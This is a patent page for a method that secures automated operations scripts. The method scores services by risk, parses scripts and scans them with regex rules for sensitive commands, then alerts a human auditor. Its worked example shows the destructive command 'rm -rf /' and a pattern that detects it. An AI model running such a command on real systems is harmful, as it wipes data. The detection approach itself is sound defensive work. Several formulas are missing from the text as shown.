CN115344868A - Automatic operation and maintenance script safety guarantee method - Google Patents
Automatic operation and maintenance script safety guarantee method Download PDFInfo
- Publication number
- CN115344868A CN115344868A CN202210956631.5A CN202210956631A CN115344868A CN 115344868 A CN115344868 A CN 115344868A CN 202210956631 A CN202210956631 A CN 202210956631A CN 115344868 A CN115344868 A CN 115344868A
- Authority
- CN
- China
- Prior art keywords
- service
- script
- representing
- representing service
- calculating
- Prior art date
- Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
- Pending
Links
Images
Classifications
-
- G—PHYSICS
- G06—COMPUTING; CALCULATING OR COUNTING
- G06F—ELECTRIC DIGITAL DATA PROCESSING
- G06F21/00—Security arrangements for protecting computers, components thereof, programs or data against unauthorised activity
- G06F21/50—Monitoring users, programs or devices to maintain the integrity of platforms, e.g. of processors, firmware or operating systems
- G06F21/57—Certifying or maintaining trusted computer platforms, e.g. secure boots or power-downs, version controls, system software checks, secure updates or assessing vulnerabilities
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L63/00—Network architectures or network communication protocols for network security
- H04L63/14—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
- H04L63/1408—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic by monitoring network traffic
Landscapes
- Engineering & Computer Science (AREA)
- Computer Security & Cryptography (AREA)
- Computer Hardware Design (AREA)
- General Engineering & Computer Science (AREA)
- Software Systems (AREA)
- Theoretical Computer Science (AREA)
- Physics & Mathematics (AREA)
- General Physics & Mathematics (AREA)
- Computing Systems (AREA)
- Computer Networks & Wireless Communication (AREA)
- Signal Processing (AREA)
- Monitoring And Testing Of Exchanges (AREA)
Abstract
The invention provides a safety guarantee method for an automatic operation and maintenance script, which comprises the following steps: (1) presetting rules; (2) Appointing a script auditor to perform manual intervention, calculating the script proportion of each service, calculating the change of system resources caused by each service, calculating the proportion of uplink flow and downlink flow of each service in T time, obtaining a service risk value of each service, determining a suspected dangerous script and informing the script auditor to perform auditing treatment; (3) analyzing the script; (4) regular scanning; and (5) dynamically auditing. The invention has the beneficial effects that: the system is subjected to timed and quantitative manual intervention according to the current system operation condition, so that the safe operation of the operation and maintenance system can be guaranteed, and the misjudgment caused by service change is avoided. The invention does not need a large amount of manual operation, has small calculated amount and accurate analysis, thereby greatly reducing misjudgment and improving the monitoring coverage and the accuracy.
Description
Technical Field
The invention relates to the field of automation operation and maintenance, in particular to a safety guarantee method for an automation operation and maintenance script.
Background
The IT system can typically audit the actual execution script based on the parameter configuration and sensitive commands, thereby ensuring that the script is executed securely on the resource device. The decision steps of most current methods are as follows: (1) presetting rules: after the system is installed, automatically calling an initialization script to initialize a preset rule, wherein the preset rule comprises a preset script sensitive command and a parameter value matching rule, and allowing to adjust and appoint a script auditor according to the requirement; (2) script parsing: reading the script file line by line, analyzing the command line according to the script analyzer, outputting the analyzed command line, and triggering the rule scanning; (3) regular scanning: performing regular operation on the analyzed command line according to the matching rule, and outputting and recording a sensitive command line; and (4) dynamic auditing: and the dynamic audit informs an auditor and carries out audit processing on the sensitive command line.
In fact, scripts that run automatically are more likely to produce system attack behavior than scripts that operate manually. In the actual running process of the script, system resources are always automatically configured, and further, various changes such as communication traffic, running script types and the like are caused. The existing method usually depends on analyzing the script and matching the rule to check the script, and does not consider the change of the system configuration communication traffic and the like caused by the service change. However, the attack process usually occurs in a particularly regular operation and maintenance system, and the prior art has the disadvantage that the script data is only audited based on a method for analyzing the script and matching the rule, and the manual intervention for timing and quantifying the operation and maintenance system is not considered. Therefore, it is easy to misjudge a change in system configuration, traffic amount, and the like due to a service change.
Disclosure of Invention
Aiming at the problem that the existing operation and maintenance system script safety guarantee method only analyzes data of script data and depends on a rule matching method to a great extent, the invention provides an automatic operation and maintenance script safety guarantee method, and a manually defined script risk assessment method is introduced on the basis of preset rules.
The object of the present invention is achieved by the following technical means. An automatic operation and maintenance script safety guarantee method comprises the following steps:
(1) And presetting rules: after the system is installed, automatically calling an initialization script to initialize a preset rule, wherein the preset rule comprises a preset script sensitive command and a parameter value matching rule, and allowing to adjust and appoint a script auditor according to the requirement;
(2) Appointing a script auditor to perform manual intervention, counting the running condition of the system in T time from the current moment, calculating the script proportion of each service, calculating the change of system resources caused by each service, calculating the proportion of uplink flow and downlink flow of each service in T time, obtaining the service risk value of each service, determining a suspected dangerous script and informing the script auditor to perform audit processing;
(3) And script analysis: forming a script file for the script which is not identified as the suspected dangerous script; reading the script file line by line from top to bottom, analyzing according to the script analyzer, outputting the analyzed command line, and triggering regular scanning;
(4) And regular scanning: scanning the analyzed command line by line, performing regular matching operation on the analyzed command line according to a matching rule expression, outputting a sensitive command line and recording the sensitive command line;
(5) And dynamic auditing: and checking whether a sensitive command line exists in the scanning result, and if so, informing a script auditor to audit.
The specific method comprises the following steps:
(2.1) observing the running condition within the T time from the current moment to the front;
(2.2) computing service A i Script proportion of P i ,Wherein N denotes the number of services, A i Service denoted by reference number i, count (A) i ) Representing service A i The number of scripts called in T time;
(2.3) a cause of computing service A i Induced change of system resourceThe index data of the system resources comprises the occupancy rate of a disk space, the utilization rate of a CPU (Central processing Unit), the utilization rate of a memory, the number of used ports, the number of starting items and the number of used databases;
(2.4) calculating the service A in the T time i Ratio of uplink traffic to downlink traffic of i ,
(2.6) when the system runs, the business risk value is calculatedAnd setting the service larger than the threshold value as a suspected dangerous service, and setting a script called in the suspected dangerous service as a suspected dangerous script.
Furthermore, in the step (2.3), the specific method is as follows: specifically, statistical service A i Calculating the difference value between the index data of the system resources in the T time and the index data in normal operation without any application, and normalizing to obtain the service A i Induced changes in system resources
Wherein k is 1 +k 2 +k 3 +k 4 +k 5 +k 6 =1,k 1 ,k 2 ,k 3 ,k 4 ,k 5 ,k 6 Is a coefficient of proportionality that is,representing service A i Disk space occupancy rate, disk, in normal operation without any application i Representing service A i The disk occupancy rate of (a) is,representing service A i The maximum allowed disk occupancy;representing service A i CPU utilization during normal operation without any application, CPU i Representing service A i The utilization rate of the CPU,representing service A i Maximum CPU utilization allowed;representing service A i Memory utilization, mem, when no application is running under normal conditions i Representing service A i The utilization rate of the memory of (a) is,representing service A i Maximum allowed memory utilization;representing service A i Number of ports used during normal operation without any application, port i Representing service A i The number of ports to be used of (c),representing service A i The maximum number of allowed port uses;representing service A i Number of Start items when no application is running under normal conditions, start i Representing service A i The number of the starting items of (2),representing service A i The maximum number of the allowed starting items;representing service A i Number of database uses, DB, when no application is running under normal conditions i Representing service A i The number of the used databases of (a) is,representing service A i The maximum number of database uses allowed.
Furthermore, in the step (2.4), the specific method is as follows:
out j representing service A i Length of corresponding j-th uplink flow in j Representing service A i The length of the corresponding j-th downlink flow, m and n respectively represent the service A i The number of the uplink flow and the downlink flow in the T time.
The beneficial effects of the invention are as follows: the invention carries out timed and quantitative manual intervention on the system according to the current system operation condition, can ensure the safe operation of the operation and maintenance system, and avoids misjudgment caused by service change. The invention does not need a large amount of manual operation, has small calculated amount and accurate analysis, thereby greatly reducing misjudgment and improving the monitoring coverage and the accuracy.
Drawings
FIG. 1 is a schematic flow chart of a security method for executing an automated operation and maintenance script according to the present invention;
FIG. 2 is a schematic flow chart of selecting a suspected danger script file for manual intervention;
FIG. 3 is a schematic view of a script parsing flow;
fig. 4 is a schematic diagram of a rule scanning process.
Detailed Description
The invention will be described in detail with reference to the following figures and examples:
as shown in fig. 1, in an automatic operation and maintenance script security guarantee method, rule presetting is performed first during system initialization, and then the following is implemented by running 4 modules: the system comprises a preset rule and manual intervention module, a script analysis module, a rule scanning module and a dynamic auditing module. Wherein: 1. and the preset rule and manual intervention module is used for obtaining a suspected dangerous script file by calculating the service risk value. 2. The script analysis module is used for reading and analyzing the script line by line from top to bottom through the script analyzer and outputting the analyzed script, and then triggering and calling rule scanning to perform rule matching operation on the analyzed script; 3. the rule scanning module is used for acquiring the analyzed and output script lines, performing regular matching operation according to the scanning rule, and outputting and storing the sensitive command lines; 4. and the dynamic auditing module checks whether the scanning result has a sensitive command line, automatically informs an auditor to audit if the scanning result has the sensitive command line, and otherwise, does not process the scanning result. Generally, script files are executed in three ways: manual execution, timed execution, and third party call execution. The method comprises the following steps:
(1) And presetting rules: after the system is installed, automatically calling the initialization script to initialize the preset rule, wherein the preset rule comprises a preset script sensitive command and a parameter value matching rule, and the preset script sensitive command and the parameter value matching rule are allowed to be adjusted and appointed as required;
(2) The method comprises the following steps of appointing script auditors to perform manual intervention, determining suspected dangerous scripts from three dimensions of the service operated by a system, wherein the three dimensions are respectively the operation script proportion of each service, the change of system resources caused by service change and the proportion of uplink and downlink flow, finally calculating a service risk value for each service, and setting a corresponding script file as a suspected dangerous script file when the value is greater than 0.7, wherein the specific steps are as follows:
(2.1) observing the running condition within the T time from the current moment to the front;
(2.2) computing service A i Script proportion of P i ,Specifically, each service a is counted i The script sequence used by the terminal in T time, wherein N represents the number of services, A i Denotes a service, count (A), denoted by reference number i i ) Representing service A i The number of scripts called in T time;
(2.3) account cause service A i Induced changes in system resourcesThe index data of the system resources comprises the occupancy rate of a disk space, the utilization rate of a CPU (Central processing Unit), the utilization rate of a memory, the number of used ports, the number of starting items and the number of used databases;
specifically, statistical service A i Calculating the difference value between the index data of the system resources in the T time and the index data in normal operation without any application, and normalizing to obtain the service A i Induced change of system resource
Wherein k is 1 +k 2 +k 3 +k 4 +k 5 +k 6 =1,k 1 ,k 2 ,k 3 ,k 4 ,k 5 ,k 6 The scale factor is preset to be 1/6,representing service A i Disk space occupancy rate, disk, in normal operation without any application i Representing service A i The disk occupancy rate of (a) is,representing service A i The maximum allowed disk occupancy;representing service A i CPU utilization during normal operation without any application, CPU i Representing service A i The utilization rate of the CPU,representing service A i Maximum allowed CPU utilization;representing service A i Memory utilization, mem, at normal times when no application is running i Representing service A i The utilization rate of the memory of the system,representing service A i Maximum allowed memory utilization;representing service A i Number of ports used during normal operation without any application, port i Representing service A i The number of the ports to be used,representing service A i The maximum number of allowed port uses;representing service A i Number of Start items when no application is running under normal conditions, start i Representing service A i The number of the starting items of (2),representing service A i The maximum number of the allowed starting items;representing service A i Number of database uses, DB, when no application runs under normal conditions i Representing service A i The number of the used databases of (2),representing service A i The maximum number of database uses allowed.
(2.4) calculating the service A in the T time i Ratio of uplink traffic to downlink traffic of i ,
out j representing service A i Length of corresponding j-th uplink flow in j Representing service A i The length of the corresponding jth downlink flow, m and n respectively represent the service A i And the flow number of the uplink flow and the downlink flow in the T time.
(2.6) when the system runs, the business risk value is calculatedAnd setting the service larger than the threshold (which can be preset to be 0.7) as a suspected dangerous service, and setting the script called in the suspected dangerous service as a suspected dangerous script.
(3) And script analysis: forming script files for scripts that are not identified as suspected dangerous scripts (i.e., storing the collected scripts in a file); reading the script file line by line from top to bottom, analyzing according to the script analyzer, outputting the analyzed command line, and triggering regular scanning;
FIG. 3 details the script parsing process of the present invention: when executing the script, firstly reading the script content line by line; secondly, reading the script content of each line, analyzing the script content through a script analyzer, and outputting CmdLine, such as the contents of the script file lines: rm-rf $ { path }, path parameter value: v, output CmdLine: { "lineNum":1, "parsedcdline": rm-rf/"}; and finally triggering and calling rule scanning to scan the CmdLine.
(4) And regular scanning: as shown in fig. 4, the analyzed command line is scanned line by line, and the analyzed command line is subjected to regular matching operation according to the matching rule expression, and a sensitive command line is output and recorded;
FIG. 4 details the rule scanning process in the present invention: when the command is triggered and called, firstly reading the analyzed command line CmdLine; and secondly, reading a command line matching rule to perform regular operation on the analyzed command line CmdLine, and outputting a sensitive command line, such as' CmdLine: { "lineNum":1, "parsedcdline": "rm-rf/" }, cmdRegex: rm-rf \ and outputs ResultLine { "LineNum":1, "parsecmdLine": rm-rf/"}; and finally, storing all the sensitive command lines and establishing a relation with the script file as a basis for dynamically auditing the automatic notification and auditing the script by auditors.
(5) And dynamic auditing: and checking whether a scanning result has a sensitive command line, if so, notifying a script auditor to audit, and if not, not processing.
It should be understood that the technical solutions and the inventive concepts of the present invention should be replaced or changed by equivalents and modifications to the technical solutions and the inventive concepts of the present invention by those skilled in the art.
Claims (4)
1. An automatic operation and maintenance script safety guarantee method is characterized by comprising the following steps: the method comprises the following steps:
(1) And presetting rules: after the system is installed, automatically calling an initialization script to initialize a preset rule, wherein the preset rule comprises a preset script sensitive command and a parameter value matching rule, and allowing to adjust and appoint a script auditor according to the requirement;
(2) Appointing a script auditor to perform manual intervention, counting the running condition of the system in T time from the current time, calculating the script proportion of each service, calculating the change of system resources caused by each service, calculating the proportion of uplink flow and downlink flow of each service in T time, and obtaining the service risk value of each service, thereby determining the suspected dangerous script;
(3) And script analysis: forming a script file for the script which is not determined as the suspected dangerous script; reading the script files line by line from top to bottom, analyzing according to a script analyzer, outputting an analyzed command line, and triggering regular scanning;
(4) And regular scanning: scanning the analyzed command line by line, performing regular matching operation on the analyzed command line according to a matching rule expression, outputting a sensitive command line and recording the sensitive command line;
(5) And dynamic auditing: and checking whether a sensitive command line exists in the scanning result, and if so, informing a script auditor to audit.
2. The automated operation and maintenance script security assurance method of claim 1, wherein: in the step (2), the specific method is as follows:
(2.1) observing the operation condition in T time before the current moment;
(2.2) computing service A i Script proportion of P i ,Wherein N denotes the number of services, A i Service denoted by reference number i, count (A) i ) Representing service A i The number of scripts called in T time;
(2.3) a cause of computing service A i Induced change of system resourceThe index data of the system resources comprises the occupancy rate of a disk space, the utilization rate of a CPU (Central processing Unit), the utilization rate of a memory, the number of used ports, the number of started items and the number of used databases;
(2.4) calculating the service A in the T time i Ratio of uplink traffic to downlink traffic of i ,
3. The automated operation and maintenance script security assurance method of claim 2, wherein: in the step (2.3), the specific method is as follows: specifically, statistical service a i Calculating the difference value between the index data of the system resources in the T time and the index data in normal operation without any application, and normalizing to obtain the service A i Induced changes in system resources
Wherein k is 1 +k 2 +k 3 +k 4 +k 5 +k 6 =1,k 1 ,k 2 ,k 3 ,k 4 ,k 5 ,k 6 Is a coefficient of proportionality that is,representing service A i Disk space occupancy, disk, under normal conditions when no application is running i Representing service A i The disk occupancy rate of (a) is,representing service A i The maximum allowed disk occupancy;representing service A i CPU utilization during normal operation without any application, CPU i Representing service A i The utilization rate of the CPU,representing service A i Maximum CPU utilization allowed;representing service A i Memory utilization, mem, at normal times when no application is running i Representing service A i The utilization rate of the memory of the system,representing service A i Maximum allowed memory utilization;representing service A i Number of ports used during normal operation without any application, port i Representing service A i The number of ports to be used of (c),representing service A i The maximum number of ports to be allowed;representing service A i Number of Start items when no application is running under normal conditions, start i Representing service A i The number of the starting items of (2),representing service A i The maximum number of the allowed starting items;representing service A i Number of database uses, DB, when no application is running under normal conditions i Representing service A i The number of the used databases of (2),representing service A i Maximum number of database uses allowed。
4. The automated operation and maintenance script security assurance method of claim 2, wherein: in the step (2.4), the specific method is as follows:
Priority Applications (1)
Application Number | Priority Date | Filing Date | Title |
---|---|---|---|
CN202210956631.5A CN115344868A (en) | 2022-08-10 | 2022-08-10 | Automatic operation and maintenance script safety guarantee method |
Applications Claiming Priority (1)
Application Number | Priority Date | Filing Date | Title |
---|---|---|---|
CN202210956631.5A CN115344868A (en) | 2022-08-10 | 2022-08-10 | Automatic operation and maintenance script safety guarantee method |
Publications (1)
Publication Number | Publication Date |
---|---|
CN115344868A true CN115344868A (en) | 2022-11-15 |
Family
ID=83952498
Family Applications (1)
Application Number | Title | Priority Date | Filing Date |
---|---|---|---|
CN202210956631.5A Pending CN115344868A (en) | 2022-08-10 | 2022-08-10 | Automatic operation and maintenance script safety guarantee method |
Country Status (1)
Country | Link |
---|---|
CN (1) | CN115344868A (en) |
Cited By (1)
Publication number | Priority date | Publication date | Assignee | Title |
---|---|---|---|---|
CN115544524A (en) * | 2022-11-30 | 2022-12-30 | 北京广通优云科技股份有限公司 | IT system automation operation and maintenance script execution safety guarantee method for preventing data leakage |
-
2022
- 2022-08-10 CN CN202210956631.5A patent/CN115344868A/en active Pending
Cited By (1)
Publication number | Priority date | Publication date | Assignee | Title |
---|---|---|---|---|
CN115544524A (en) * | 2022-11-30 | 2022-12-30 | 北京广通优云科技股份有限公司 | IT system automation operation and maintenance script execution safety guarantee method for preventing data leakage |
Similar Documents
Publication | Publication Date | Title |
---|---|---|
US10805151B2 (en) | Method, apparatus, and storage medium for diagnosing failure based on a service monitoring indicator of a server by clustering servers with similar degrees of abnormal fluctuation | |
CN108667856B (en) | Network anomaly detection method, device, equipment and storage medium | |
US20180225320A1 (en) | Anomaly Detection at Coarser Granularity of Data | |
CN109635564A (en) | A kind of method, apparatus, medium and equipment detecting Brute Force behavior | |
KR101687169B1 (en) | System for determining/validating a tolerance of correlation with repetitive cross-validation technique and method therefor | |
CN111309539A (en) | Abnormity monitoring method and device and electronic equipment | |
CN108830696A (en) | Reference reports analyzing and processing method, device, computer equipment and storage medium | |
CN115344868A (en) | Automatic operation and maintenance script safety guarantee method | |
CN108416677A (en) | The method and device of Claims Resolution investigation | |
US20230419202A1 (en) | METHODS, INTERNET OF THINGS (IoT) SYSTEMS, AND MEDIUMS FOR MANAGING TIMELINESS OF SMART GAS DATA | |
WO2020233021A1 (en) | Test result analysis method based on intelligent decision, and related apparatus | |
CN110878709B (en) | Method for establishing jam recognition mechanism of steam turbine valve and jam recognition method | |
CN113935696A (en) | Consignment behavior abnormity analysis method and system, electronic equipment and storage medium | |
CN115378928B (en) | Monitoring method and system based on cloud service | |
CN115309638A (en) | Method and device for assisting model optimization | |
CN112422333B (en) | Distribution network condition determining method, system and related device | |
CN115544524B (en) | IT system automation operation and maintenance script execution safety guarantee method for preventing data leakage | |
CN112395280B (en) | Data quality detection method and system | |
CN110515796B (en) | Cortex learning-based anomaly detection method and device and terminal equipment | |
CN113158988A (en) | Financial statement processing method and device and computer readable storage medium | |
CN111010393B (en) | Anomaly detection and elimination method for big data cleaning | |
CN112417007A (en) | Data analysis method and device, electronic equipment and storage medium | |
EP3772834B1 (en) | A method of predicting the time course of a plurality of data relative to a telephony infrastructure for network function virtualization | |
CN116131928B (en) | Optical transmission line adjustment method, device, equipment and storage medium | |
CN117436820B (en) | Control method and system based on artificial intelligence |
Legal Events
Date | Code | Title | Description |
---|---|---|---|
PB01 | Publication | ||
PB01 | Publication | ||
SE01 | Entry into force of request for substantive examination | ||
SE01 | Entry into force of request for substantive examination |